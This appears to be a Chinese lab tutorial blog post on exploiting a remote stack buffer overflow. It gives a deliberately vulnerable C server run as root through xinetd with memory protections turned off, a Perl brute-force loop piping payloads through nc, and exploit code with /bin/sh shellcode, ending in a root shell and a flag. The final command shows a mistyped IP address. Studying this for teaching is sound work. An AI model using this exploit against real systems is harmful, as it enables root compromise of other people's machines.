远程缓冲区漏洞攻击(环境搭建及攻击方法)

作者: admin 分类: 杂项 发布时间: 2019-05-29 21:58

一、漏洞环境搭建

实验环境

操作系统:CentOS5.5

安装的服务:gdb gcc xinetd

实验前提

去掉操作系统的堆栈执行保护和内存随机化机制

sysctl -w kernel.randomize_va_space=0 && sysctl -w kernel.exec- shield=0

目标漏洞代码:

#include<stdio.h>
#include<string.h>
#include<ctype.h>
int doit(char *str)
{
  char bufz[400];
  printf("doing stuffz...\n");
  strcpy(bufz,str);
  return(0);
}
int main(int argc,char *argv[])
{
  char buf[4096];
  gets(buf);
  doit(buf);
  //doit(argv[1]);
  printf("DONE STUFFZ..[%s]\n",buf);
  return(0);
}

编辑好之后保存为C文件 放于/root目录下

之后编译文件 gcc -o vuln vuln.c 编译好之后源文件不要删

编辑文件 /etc/services 添加以下信息

vuln      555/tcp
#added to test remote exploit

然后在/etc/xinetd.d/目录下创建以下脚本文件 此文件没有任何格式 直接保存为 vuln 即可

#default:on
#description:The vuln server is to test remote exploits,do NOT leave
#in place!!! It is vulnerable.!!
service vuln
{
  flags     =   REUSE
  socket_type   =   stream
  wait          =   no
  user          =   root
  server        =   /root/vuln
  #log_on_failure+  =   USERID
}

之后重启xinetd进程

/etc/init.d/xinetd restart

最后检查是否开启555端口

二、攻击过程

首先确定远程靶机的esp值

[root@localhost ~]# gdb vuln
GNU gdb (GDB) Red Hat Enterprise Linux (7.0.1-23.el5)
Copyright (C) 2009 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.  Type "show copying"
and "show warranty" for details.
This GDB was configured as "i386-redhat-linux-gnu".
For bug reporting instructions, please see:
<http://www.gnu.org/software/gdb/bugs/>...
Reading symbols from /root/vuln...(no debugging symbols found)...done.
(gdb) b main
Breakpoint 1 at 0x8048453
(gdb) run
Starting program: /root/vuln

Breakpoint 1, 0x08048453 in main ()
(gdb) info reg esp
esp            0xbfffea54       0xbfffea54
(gdb)

这里获得的esp值为 0xbfffea54

现在编一个脚本进行暴力攻击

#! /usr/bin/perl
$MIN=0;
$MAX=5000;
while($MIN<$MAX){
printf("offset:$MIN Hold down the enter key til program stops...\n");
system("(./exploit 1224 $MIN 0xbfffea54;cat) | nc 172.16.1.103 555");$MIN++;
}

保存为 brute.pl

其中exploit代码如下

#include<stdio.h>
char shellcode[]= //setuid(0)
  "\x31\xc0\x31\xdb\xb0\x17\xcd\x80"
  "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
  "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
  "\x80\xe8\xdc\xff\xff\xff/bin/sh";
  
unsigned long get_sp(void){
  __asm__("movl %esp,%eax");
}
int main(int argc,char *argv[1]){
int i,offset=0;
long esp,ret,*addr_ptr;
char *buffer,*ptr;
int size=500;
esp=get_sp();
if(argc>1) size=atoi(argv[1]);
if(argc>2) offset=atoi(argv[2]);
if(argc>3) esp=strtoul(argv[3],NULL,0); 
ret=esp-offset;
fprintf(stderr,"Usage:%s<buff_size><offset><esp:0xfff...>\n",argv[0]);
fprintf(stderr,"ESP:0x%x Offset:0x%x Return:0x%x\n",esp,offset,ret);
buffer=(char *)malloc(size);
ptr=buffer;
addr_ptr=(long *)ptr;
for(i=0;i<size;i+=4){
*(addr_ptr++)=ret;
}
for(i=0;i<size/2;i++){
buffer[i]='\x90';}
ptr=buffer+size/2;
for(i=0;i<strlen(shellcode);i++){
*(ptr++)=shellcode[i];
}
buffer[size-1]=0;
printf("%s",buffer);
free(buffer);
return 0;
}

保存为 exploit.c 然后编译 gcc -o exploit exploit.c

Tips:最好在CentOS5.5里面编译它 以免后面操作遇见不可预知的错误

过程

[root@kali:~# perl brute.pl
offset:0 Hold down the enter key til program stops...
Usage:./exploit<buff_size><offset><esp:0xfff...>
ESP:0xbfffea54 Offset:0x6f7 Return:0xbfffe35d
.
.
.
.
省略2000多次
.
.
.
offset:2272 Hold down the enter key til program stops...
Usage:./exploit<buff_size><offset><esp:0xfff...>
ESP:0xbfffea54 Offset:0x8e0 Return:0xbfffe174

id      ###这里是手动输入的
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)

cat /root/flag.txt
123456789 555

成功获得shell

之后可以直接用 (./exploit 1224 2272 0xbfffea54;cat) | nc 172.16.103 555 进行攻击

文中有不足之处评论区见······

如果觉得我的文章对您有用,请随意赞赏。您的支持将鼓励我继续创作!

发表评论